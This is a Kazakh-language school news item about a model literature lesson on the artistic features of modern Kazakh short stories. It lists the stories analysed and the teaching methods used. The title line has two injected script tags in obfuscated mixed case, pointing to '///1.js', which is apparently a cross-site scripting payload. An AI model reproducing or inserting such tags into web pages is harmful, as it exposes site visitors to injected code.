"Қазіргі қазақ әңгімелерінің көркемдік ерекшеліктерін анықтау" тақырыбында үлгі сабақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.03.2024

Қазіргі қазақ әңгімелерінің көркемдік ерекшеліктерін тапсырмаларды орындай отырып анықтау,  Т. Әсемқұловтың «Бекторының қазынасы» әңгімесі және Ә.Таразидың «Андрей» әңгіме-эссесін талдау, тәуелсіздік жылдарында жазылған қазақ әңгімелерінің көркемдік ерекшелігін анықтау,  білім алушылардың әдеби-теориялық білімдерін нығайту мақсатында педагог-модератор А.М.Қайырбай қазіргі заман әдебиеті пәнінен "Қазіргі қазақ әңгімелерінің көркемдік ерекшеліктерін анықтау" тақырыбында үлгі сабақ өткізді. 
Сабақ барысы «Кітапқа құштар топ» жобасы форматында ұйымдастырылады.   «Бір минутта бір кітап» тәсілі, топқа бөлуде «Пазл әдісі» , «DID.COM» жасанды интеллект арқылы жасалған бейнематериалдар форматындағы тапсырмалар орындап, «Жетістік» баспалдағы арқылы бағалау, «JOYTEKA» білім беру платформасында қорытынды тапсырмалар, «Мен оқыған кітап» әдісі арқылы  сабақтан алған әсері негізінде кітапқа атау беріп, шығармашылықтарын таныта білді.

Просмотров: 954


Пікір қосу



Деректерді қолтаңбаға қосу